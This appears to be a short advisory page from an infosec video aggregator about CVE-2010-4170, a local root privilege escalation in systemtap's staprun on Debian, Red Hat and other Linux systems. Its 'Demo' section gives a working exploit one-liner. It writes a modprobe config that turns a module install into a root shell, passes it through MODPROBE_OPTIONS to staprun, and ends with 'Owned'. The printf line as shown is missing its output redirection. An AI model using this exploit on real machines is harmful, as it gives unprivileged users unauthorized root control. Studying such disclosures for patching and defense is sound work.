Description: CVE-2010-4170 systemtap Local Root Privilege Escalation Vulnerability
Timeline :
Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17
Provided by:
Tavis Ormandy
Reference(s) :
CVE-2010-4170
Affected versions :
Red Hat, Fedora, Debian, Ubuntu, etc.
Tested on Debian squeeze/sid with :
systemtap-runtime_1.0-2_i386.deb
Description:
It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.
Demo :
Require "systemtap-runtime" on Debian
id
printf "install uprobes /bin/sh" exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
id
Owned
Tags: 0day , linux , systemtap ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.